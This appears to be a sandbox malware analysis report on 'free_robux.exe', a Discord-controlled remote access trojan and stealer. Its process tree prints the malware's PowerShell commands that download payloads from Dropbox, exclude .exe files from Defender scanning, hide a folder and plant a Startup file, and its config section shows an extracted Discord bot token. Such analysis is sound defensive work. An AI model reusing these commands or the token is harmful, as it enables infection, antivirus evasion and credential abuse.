discordrat | hxxps://cdn[.]discordapp[.]com/attachments/1229097803268227114/1229105302264217681/free_robux[.]exe?ex=662e7883&is=661c0383&hm=e22f9ad8f9b39c1d906eebb9108b395a29786544df365f91714a0fe93dff0c1b&

Analysis

max time kernel
121s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
14-04-2024 16:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1229097803268227114/1229105302264217681/free_robux.exe?ex=662e7883&is=661c0383&hm=e22f9ad8f9b39c1d906eebb9108b395a29786544df365f91714a0fe93dff0c1b&

Score

10^/10

discordrat persistence rat rootkit spyware stealer

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTA2ODI0MTMyMDk4MTgyNzU5NA.GDi6tE.t2T-c9UBEtvdju9XJt2A5HWfqJ2wasQ2apTfdg
server_id
1068241914974974063

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
102	1640	powershell.exe
107	1640	powershell.exe
112	2880	powershell.exe
114	2880	powershell.exe

Downloads MZ/PE file

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rundll32.exe	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4780	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
123	discord.com
124	discord.com
127	discord.com
130	raw.githubusercontent.com
131	raw.githubusercontent.com
133	discord.com
134	discord.com

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
1640	powershell.exe
1640	powershell.exe
1640	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
2880	powershell.exe
2880	powershell.exe
2880	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeDebugPrivilege	3752	powershell.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	4780	rundll32.exe
Token: SeShutdownPrivilege	4780	rundll32.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3452	free_robux.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 3452 wrote to memory of 2212	3452	free_robux.exe	114
PID 3452 wrote to memory of 2212	3452	free_robux.exe	114
PID 3452 wrote to memory of 2212	3452	free_robux.exe	114
PID 2212 wrote to memory of 4980	2212	cmd.exe	116
PID 2212 wrote to memory of 4980	2212	cmd.exe	116
PID 2212 wrote to memory of 4980	2212	cmd.exe	116
PID 2212 wrote to memory of 1640	2212	cmd.exe	117
PID 2212 wrote to memory of 1640	2212	cmd.exe	117
PID 2212 wrote to memory of 1640	2212	cmd.exe	117
PID 2212 wrote to memory of 4944	2212	cmd.exe	119
PID 2212 wrote to memory of 4944	2212	cmd.exe	119
PID 2212 wrote to memory of 4944	2212	cmd.exe	119
PID 4944 wrote to memory of 3752	4944	cmd.exe	121
PID 4944 wrote to memory of 3752	4944	cmd.exe	121
PID 4944 wrote to memory of 3752	4944	cmd.exe	121
PID 4944 wrote to memory of 2880	4944	cmd.exe	122
PID 4944 wrote to memory of 2880	4944	cmd.exe	122
PID 4944 wrote to memory of 2880	4944	cmd.exe	122
PID 4944 wrote to memory of 4780	4944	cmd.exe	123
PID 4944 wrote to memory of 4780	4944	cmd.exe	123

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4980	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1229097803268227114/1229105302264217681/free_robux.exe?ex=662e7883&is=661c0383&hm=e22f9ad8f9b39c1d906eebb9108b395a29786544df365f91714a0fe93dff0c1b&
1⤵
PID:4108

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=5656 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:1
1⤵
PID:3936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5776 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:1
1⤵
PID:4972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5888 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:8
1⤵
PID:5092

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=5336 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:8
1⤵
PID:4600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=6224 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:1
1⤵
PID:4900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=6452 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:1
1⤵
PID:4256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5760 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:8
1⤵
PID:208

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=5520 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:8
1⤵
PID:2772

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4d8 0x308
1⤵
PID:4204

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6092 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:8
1⤵
PID:3576

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --mojo-platform-channel-handle=5964 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:8
1⤵
PID:3824

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=3916 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:8
1⤵
PID:4576

C:\Users\Admin\Downloads\free_robux.exe
"C:\Users\Admin\Downloads\free_robux.exe"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3452
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t8435.bat" "C:\Users\Admin\Downloads\free_robux.exe" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2212
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h C:\Users\Admin\AppData\Local\Temp\ytmp
    3⤵
    - Views/modifies file attributes
    PID:4980
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-Webrequest 'https://www.dropbox.com/scl/fi/ntep6etnwv2a7zy9d24rk/installer.bat?rlkey=8vabtz5foxnu5c8kwlwf5tsk0&dl=1' -OutFile installer.bat"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K installer.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4944
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Powershell -Command "Set-MpPreference -ExclusionExtension exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3752
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Powershell -Command "Invoke-Webrequest 'https://www.dropbox.com/scl/fi/a00j82aaume93lmgxjaf2/rundll32.exe?rlkey=g48q2ygxx00qamw9rthbyuycd&dl=1' -OutFile rundll32.exe"
      4⤵
      Blocklisted process makes network request
      Drops startup file
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2880
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rundll32.exe
      rundll32.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=6680 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:8
1⤵
PID:4572

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:976

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
4280e36a29fa31c01e4d8b2ba726a0d8

SHA1
c485c2c9ce0a99747b18d899b71dfa9a64dabe32

SHA256
e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

SHA512
494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
c52aba0bcd0e6e2bd2093f90fc6e248a

SHA1
541e32252763475b24216fd7032d9eb610cbdc62

SHA256
2f49968057fb0179836a4d6994a178fec195646b79873216bd29193d56a097b9

SHA512
66b26ca91a73d7a31ef72dcd848142050ad233b963dfb341b993849c5ae6711c330a8ab87e087ef5cd2a9de4d4ccd50d36cd8bfae7b2463b76709fa00cbece2b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
ac816ff5c9ec794bdd1709cb7e10132a

SHA1
8c13526aad0e3ad99c1b77a3346b1965fca18ca1

SHA256
243c24567de61351d6367d6669c9e86e1b69cbe1d87f59c471ccd7f3972c0b31

SHA512
64c9115379c0d4aa07f285dd17c9ecc9c233429511a44086742af549889432c12af7d9d15b6c7bc38df36ebb9e0f3d30e55eec4d34b82d03992ffb16eef18646

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_whq3fn3q.ukp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\installer.bat

Filesize
351B

MD5
565bc27d1ce261089248e015686ced44

SHA1
c0d5ae4157d640be0a92ff2ca65aae2df779d89c

SHA256
a7814711561ea3f63b7024b8f0c86fa821a289d6e921250e5645dd711f985085

SHA512
3908e46cca31d62455851573b8130d32f33a1b176b6a409f666c2a5295a13c2a2343445a904df1c215a20082101934c4f86af3fa21f16adc5eb5aa4fac7fa53e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ytmp\t8435.bat

Filesize
552B

MD5
dfd2b3bcdf0ade1d8fb5a890db00b101

SHA1
66e73565c5fd4c0ce68f1dfe0504196878a6559c

SHA256
8896a7c0a9ca2850e8eb9fc2322604d6f9ed93a9b2e574d5f9bbf409dab1d240

SHA512
9fbe9d5f3ce7961041424781ffbdabae2467f2a1e12e6ab56e134ca9530004cce629bbbe486d90cc826dc721586bb4303e275e4787d21986f8926155308ae011

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rundll32.exe

Filesize
78KB

MD5
07b4cb955d927adf3b6e6759afddeb3b

SHA1
325dfb2c21dd42f9f283371ee324d9970d382582

SHA256
1369a89434e40b5fe3271516601c2fbcf1ac2118c862b4fd5007e5008ec14384

SHA512
3564bcf82db904f8e750b0a54406eba97e676b8e580fee1669ec84374b493fa3a037f78b2d3a14c55468836453409146b57ce65d8dc3ed95df588485a9fad29b

Download Submit
memory/1640-22-0x0000000005F60000-0x0000000005F7E000-memory.dmp

Filesize
120KB

Download
memory/1640-26-0x0000000006470000-0x000000000648A000-memory.dmp

Filesize
104KB

Download
memory/1640-21-0x0000000005A50000-0x0000000005DA4000-memory.dmp

Filesize
3.3MB

Download
memory/1640-10-0x0000000005870000-0x00000000058D6000-memory.dmp

Filesize
408KB

Download
memory/1640-23-0x0000000005FA0000-0x0000000005FEC000-memory.dmp

Filesize
304KB

Download
memory/1640-24-0x0000000002960000-0x0000000002970000-memory.dmp

Filesize
64KB

Download
memory/1640-25-0x00000000075B0000-0x0000000007C2A000-memory.dmp

Filesize
6.5MB

Download
memory/1640-11-0x00000000058E0000-0x0000000005946000-memory.dmp

Filesize
408KB

Download
memory/1640-30-0x0000000073C70000-0x0000000074420000-memory.dmp

Filesize
7.7MB

Download
memory/1640-9-0x00000000056D0000-0x00000000056F2000-memory.dmp

Filesize
136KB

Download
memory/1640-8-0x0000000005040000-0x0000000005668000-memory.dmp

Filesize
6.2MB

Download
memory/1640-7-0x0000000002970000-0x00000000029A6000-memory.dmp

Filesize
216KB

Download
memory/1640-6-0x0000000002960000-0x0000000002970000-memory.dmp

Filesize
64KB

Download
memory/1640-5-0x0000000073C70000-0x0000000074420000-memory.dmp

Filesize
7.7MB

Download
memory/2880-74-0x0000000004E50000-0x0000000004E60000-memory.dmp

Filesize
64KB

Download
memory/2880-73-0x0000000074FB0000-0x0000000075760000-memory.dmp

Filesize
7.7MB

Download
memory/2880-89-0x0000000074FB0000-0x0000000075760000-memory.dmp

Filesize
7.7MB

Download
memory/2880-76-0x0000000005D00000-0x0000000006054000-memory.dmp

Filesize
3.3MB

Download
memory/2880-75-0x0000000004E50000-0x0000000004E60000-memory.dmp

Filesize
64KB

Download
memory/3752-64-0x0000000006F20000-0x0000000006F2A000-memory.dmp

Filesize
40KB

Download
memory/3752-49-0x00000000021C0000-0x00000000021D0000-memory.dmp

Filesize
64KB

Download
memory/3752-62-0x0000000006CF0000-0x0000000006D0E000-memory.dmp

Filesize
120KB

Download
memory/3752-63-0x0000000006D60000-0x0000000006E03000-memory.dmp

Filesize
652KB

Download
memory/3752-42-0x0000000005490000-0x00000000057E4000-memory.dmp

Filesize
3.3MB

Download
memory/3752-65-0x0000000007110000-0x00000000071A6000-memory.dmp

Filesize
600KB

Download
memory/3752-66-0x00000000059A0000-0x00000000059B1000-memory.dmp

Filesize
68KB

Download
memory/3752-67-0x00000000059D0000-0x00000000059DE000-memory.dmp

Filesize
56KB

Download
memory/3752-68-0x0000000007070000-0x0000000007084000-memory.dmp

Filesize
80KB

Download
memory/3752-69-0x00000000070C0000-0x00000000070DA000-memory.dmp

Filesize
104KB

Download
memory/3752-70-0x00000000070B0000-0x00000000070B8000-memory.dmp

Filesize
32KB

Download
memory/3752-72-0x0000000074FB0000-0x0000000075760000-memory.dmp

Filesize
7.7MB

Download
memory/3752-51-0x0000000006D10000-0x0000000006D42000-memory.dmp

Filesize
200KB

Download
memory/3752-36-0x00000000021C0000-0x00000000021D0000-memory.dmp

Filesize
64KB

Download
memory/3752-50-0x000000007F660000-0x000000007F670000-memory.dmp

Filesize
64KB

Download
memory/3752-52-0x0000000070DD0000-0x0000000070E1C000-memory.dmp

Filesize
304KB

Download
memory/3752-35-0x00000000021C0000-0x00000000021D0000-memory.dmp

Filesize
64KB

Download
memory/3752-48-0x0000000005D10000-0x0000000005D5C000-memory.dmp

Filesize
304KB

Download
memory/3752-34-0x0000000074FB0000-0x0000000075760000-memory.dmp

Filesize
7.7MB

Download
memory/4780-93-0x00000208C35C0000-0x00000208C35D8000-memory.dmp

Filesize
96KB

Download
memory/4780-94-0x00000208DDCC0000-0x00000208DDE82000-memory.dmp

Filesize
1.8MB

Download
memory/4780-95-0x00007FF96F0B0000-0x00007FF96FB71000-memory.dmp

Filesize
10.8MB

Download
memory/4780-96-0x00000208C52E0000-0x00000208C52F0000-memory.dmp

Filesize
64KB

Download
memory/4780-97-0x00000208DF140000-0x00000208DF668000-memory.dmp

Filesize
5.2MB

Download
memory/4780-98-0x00000208DDC30000-0x00000208DDCA6000-memory.dmp

Filesize
472KB

Download
memory/4780-99-0x00000208C5200000-0x00000208C5212000-memory.dmp

Filesize
72KB

Download
memory/4780-100-0x00000208C5240000-0x00000208C525E000-memory.dmp

Filesize
120KB

Download
memory/4780-101-0x00007FF96F0B0000-0x00007FF96FB71000-memory.dmp

Filesize
10.8MB

Download
memory/4780-102-0x00000208C52E0000-0x00000208C52F0000-memory.dmp

Filesize
64KB

Download